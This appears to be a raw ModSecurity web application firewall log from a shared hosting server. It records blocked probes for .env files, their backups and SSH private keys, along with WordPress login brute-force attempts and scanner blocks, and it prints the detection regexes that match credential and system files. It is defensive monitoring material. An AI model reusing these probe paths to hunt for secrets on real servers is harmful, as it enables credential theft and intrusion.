[Tue May 26 14:59:38.614231 2026] [security2:error] [pid 662057:tid 662253] [client 208.84.100.50:46260] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.local~"] [unique_id "ahVoAvT3lMm9tGFVg9RZzgAAAUw"]
[Tue May 26 14:59:38.614817 2026] [security2:error] [pid 662057:tid 662207] [client 208.84.100.50:46338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.production~"] [unique_id "ahVoAvT3lMm9tGFVg9RZywAAAR4"]
[Tue May 26 14:59:38.614823 2026] [security2:error] [pid 662057:tid 662191] [client 208.84.100.50:46138] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.old"] [unique_id "ahVoAvT3lMm9tGFVg9RZ0AAAAQ4"]
[Tue May 26 14:59:38.615053 2026] [security2:error] [pid 662057:tid 662274] [client 208.84.100.50:46232] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mexicoimportaciones.com"] [uri "/.env.local.backup"] [unique_id "ahVoAvT3lMm9tGFVg9RZ0QAAAWE"]
[Tue May 26 14:59:38.711437 2026] [security2:error] [pid 658374:tid 658628] [client 154.161.32.97:47151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoAp1Mb7_aby-E0KdH7gAAAHw"]
[Tue May 26 14:59:38.711542 2026] [security2:error] [pid 658374:tid 658628] [client 154.161.32.97:47151] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoAp1Mb7_aby-E0KdH7gAAAHw"]
[Tue May 26 14:59:39.050224 2026] [security2:error] [pid 658374:tid 658590] [client 154.161.32.97:47152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoA51Mb7_aby-E0KdH-gAAAFY"]
[Tue May 26 14:59:39.050365 2026] [security2:error] [pid 658374:tid 658590] [client 154.161.32.97:47152] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoA51Mb7_aby-E0KdH-gAAAFY"]
[Tue May 26 14:59:39.316609 2026] [security2:error] [pid 658374:tid 658574] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoAp1Mb7_aby-E0KdH9wAAAEY"]
[Tue May 26 14:59:40.928501 2026] [security2:error] [pid 658374:tid 658549] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoBJ1Mb7_aby-E0KdIFgAAAC0"]
[Tue May 26 14:59:42.445182 2026] [security2:error] [pid 662057:tid 662219] [client 154.161.32.97:57084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoBvT3lMm9tGFVg9RaCQAAASo"]
[Tue May 26 14:59:42.445358 2026] [security2:error] [pid 662057:tid 662219] [client 154.161.32.97:57084] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoBvT3lMm9tGFVg9RaCQAAASo"]
[Tue May 26 14:59:42.497831 2026] [security2:error] [pid 658374:tid 658593] [client 154.161.32.97:47153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoBp1Mb7_aby-E0KdIOgAAAFk"]
[Tue May 26 14:59:42.497961 2026] [security2:error] [pid 658374:tid 658593] [client 154.161.32.97:47153] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoBp1Mb7_aby-E0KdIOgAAAFk"]
[Tue May 26 14:59:43.781388 2026] [security2:error] [pid 658374:tid 658583] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoB51Mb7_aby-E0KdIRgAAAE8"]
[Tue May 26 14:59:46.195888 2026] [security2:error] [pid 662057:tid 662253] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoCfT3lMm9tGFVg9RaKgAAAUw"]
[Tue May 26 14:59:47.450179 2026] [security2:error] [pid 662057:tid 662305] [client 85.121.127.29:57682] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.strapptech.com"] [uri "/.env.old"] [unique_id "ahVoC_T3lMm9tGFVg9RaOgAAAYA"]
[Tue May 26 14:59:47.451002 2026] [security2:error] [pid 662057:tid 662236] [client 85.121.127.29:57680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.strapptech.com"] [uri "/.env.bak"] [unique_id "ahVoC_T3lMm9tGFVg9RaPQAAATs"]
[Tue May 26 14:59:47.451978 2026] [security2:error] [pid 662057:tid 662295] [client 85.121.127.29:57668] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.strapptech.com"] [uri "/.env"] [unique_id "ahVoC_T3lMm9tGFVg9RaPwAAAXY"]
[Tue May 26 14:59:47.452856 2026] [security2:error] [pid 662057:tid 662278] [client 85.121.127.29:57700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.strapptech.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVoC_T3lMm9tGFVg9RaPgAAAWU"]
[Tue May 26 14:59:47.461750 2026] [security2:error] [pid 662057:tid 662221] [client 85.121.127.29:57690] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.strapptech.com"] [uri "/api/.env"] [unique_id "ahVoC_T3lMm9tGFVg9RaTQAAASw"]
[Tue May 26 14:59:47.463026 2026] [security2:error] [pid 658374:tid 658518] [client 85.121.127.29:57704] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.strapptech.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVoC51Mb7_aby-E0KdIkQAAAA4"]
[Tue May 26 14:59:47.464103 2026] [security2:error] [pid 662057:tid 662247] [client 85.121.127.29:57678] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.strapptech.com"] [uri "/.env.backup"] [unique_id "ahVoC_T3lMm9tGFVg9RaTAAAAUY"]
[Tue May 26 14:59:47.465758 2026] [security2:error] [pid 658374:tid 658504] [client 85.121.127.29:57694] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.strapptech.com"] [uri "/backend/.env"] [unique_id "ahVoC51Mb7_aby-E0KdIlQAAAAA"]
[Tue May 26 14:59:47.694508 2026] [security2:error] [pid 658374:tid 658604] [client 173.239.240.51:32415] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahVoC51Mb7_aby-E0KdIiQAAAGQ"]
[Tue May 26 14:59:47.694674 2026] [security2:error] [pid 658374:tid 658604] [client 173.239.240.51:32415] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "406"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahVoC51Mb7_aby-E0KdIiQAAAGQ"]
[Tue May 26 14:59:47.842609 2026] [security2:error] [pid 658374:tid 658584] [client 85.121.127.29:57696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.strapptech.com"] [uri "/app/.env"] [unique_id "ahVoC51Mb7_aby-E0KdIowAAAFA"]
[Tue May 26 14:59:47.844251 2026] [security2:error] [pid 658374:tid 658563] [client 85.121.127.29:57698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.strapptech.com"] [uri "/public/.env"] [unique_id "ahVoC51Mb7_aby-E0KdIpwAAADs"]
[Tue May 26 14:59:48.349168 2026] [security2:error] [pid 662057:tid 662188] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoC_T3lMm9tGFVg9RafgAAAQs"]
[Tue May 26 14:59:50.696518 2026] [security2:error] [pid 662057:tid 662277] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoDvT3lMm9tGFVg9RazwAAAWQ"]
[Tue May 26 14:59:51.525877 2026] [security2:error] [pid 662057:tid 662270] [client 91.106.61.33:17724] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.ameritradeng.com"] [uri "/contact.php"] [unique_id "ahVoD_T3lMm9tGFVg9Ra7wAAAV0"]
[Tue May 26 14:59:51.525930 2026] [security2:error] [pid 662057:tid 662270] [client 91.106.61.33:17724] ModSecurity: Access denied with code 409 (phase 2). Match of "eq 1" against "&REQUEST_COOKIES:humans_21909" required. [file "/opt/mod_security/hg_rules.conf"] [line "1552"] [id "900424"] [msg "Transparent Bot Detection for Contact Forms"] [hostname "www.ameritradeng.com"] [uri "/contact.php"] [unique_id "ahVoD_T3lMm9tGFVg9Ra7wAAAV0"]
[Tue May 26 14:59:51.888400 2026] [security2:error] [pid 662057:tid 662239] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahVoDfT3lMm9tGFVg9RasAAAAT4"]
[Tue May 26 14:59:51.968117 2026] [security2:error] [pid 662057:tid 662265] [client 193.37.33.138:53777] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVoD_T3lMm9tGFVg9Ra_wAAAVg"]
[Tue May 26 14:59:52.724030 2026] [security2:error] [pid 662057:tid 662310] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoEPT3lMm9tGFVg9RbGAAAAYU"]
[Tue May 26 14:59:52.827492 2026] [security2:error] [pid 662057:tid 662292] [client 172.98.32.27:33819] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVoEPT3lMm9tGFVg9RbIgAAAXM"]
[Tue May 26 14:59:53.762019 2026] [security2:error] [pid 662057:tid 662223] [client 136.243.220.209:11487] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoEfT3lMm9tGFVg9RbRwAAAS4"]
[Tue May 26 14:59:54.851163 2026] [security2:error] [pid 662057:tid 662207] [client 47.128.63.158:20272] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.adityacreations.co.in"] [uri "/robots.txt"] [unique_id "ahVoEvT3lMm9tGFVg9RbkAAAAR4"]
[Tue May 26 14:59:55.098533 2026] [security2:error] [pid 662057:tid 662267] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoEvT3lMm9tGFVg9RbhwAAAVo"]
[Tue May 26 14:59:57.440244 2026] [security2:error] [pid 662057:tid 662252] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoFfT3lMm9tGFVg9Rb4QAAAUs"]
[Tue May 26 14:59:57.947682 2026] [security2:error] [pid 662057:tid 662275] [client 43.173.180.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVoFPT3lMm9tGFVg9Rb2gAAAWI"]
[Tue May 26 14:59:59.480842 2026] [security2:error] [pid 662057:tid 662244] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoF_T3lMm9tGFVg9RcKAAAAUM"]
[Tue May 26 14:59:59.714678 2026] [security2:error] [pid 662057:tid 662111] [remote 57.141.2.45:64457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVoF_T3lMm9tGFVg9RcNwABdjU"]
[Tue May 26 15:00:01.224251 2026] [security2:error] [pid 662057:tid 662195] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoGPT3lMm9tGFVg9RcVgAAARI"]
[Tue May 26 15:00:03.623120 2026] [security2:error] [pid 662057:tid 662206] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoG_T3lMm9tGFVg9RckgAAAR0"]
[Tue May 26 15:00:06.032107 2026] [security2:error] [pid 662057:tid 662293] [client 195.178.110.34:45914] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/crm/.env"] [unique_id "ahVoHvT3lMm9tGFVg9Rc7QAAAXQ"]
[Tue May 26 15:00:06.182749 2026] [security2:error] [pid 662057:tid 662197] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoHfT3lMm9tGFVg9Rc5wAAARQ"]
[Tue May 26 15:00:07.493926 2026] [security2:error] [pid 662057:tid 662170] [remote 109.228.50.118:53152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVoH_T3lMm9tGFVg9RdHwABR3A"]
[Tue May 26 15:00:08.547739 2026] [security2:error] [pid 662057:tid 662210] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoIPT3lMm9tGFVg9RdUwAAASE"]
[Tue May 26 15:00:08.661378 2026] [security2:error] [pid 662057:tid 662223] [client 113.30.192.97:40473] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVoIPT3lMm9tGFVg9RdZwABLlE"], referer: https://www.plenitudotonal.com/2023/
[Tue May 26 15:00:09.372545 2026] [security2:error] [pid 662057:tid 662256] [client 136.243.220.209:53613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoIfT3lMm9tGFVg9RdkQAAAU8"]
[Tue May 26 15:00:10.581152 2026] [security2:error] [pid 662057:tid 662229] [client 195.64.125.251:37887] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVoIvT3lMm9tGFVg9RdygABNGg"], referer: https://www.plenitudotonal.com/2023/
[Tue May 26 15:00:10.933114 2026] [security2:error] [pid 662057:tid 662253] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoIvT3lMm9tGFVg9Rd0QAAAUw"]
[Tue May 26 15:00:11.477247 2026] [security2:error] [pid 662057:tid 662066] [remote 216.73.217.138:27493] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "yatirimfinans.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVoI_T3lMm9tGFVg9Rd5gABLQg"]
[Tue May 26 15:00:13.176287 2026] [security2:error] [pid 662057:tid 662254] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoJPT3lMm9tGFVg9ReGQAAAU0"]
[Tue May 26 15:00:13.612983 2026] [security2:error] [pid 662057:tid 662257] [client 195.178.110.34:43612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/crm/.env"] [unique_id "ahVoJfT3lMm9tGFVg9ReMQAAAVA"]
[Tue May 26 15:00:15.270401 2026] [security2:error] [pid 662057:tid 662250] [client 2602:fb54:1400::34:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.digitalgerminate.com"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVoJ_T3lMm9tGFVg9RecQAAAUk"]
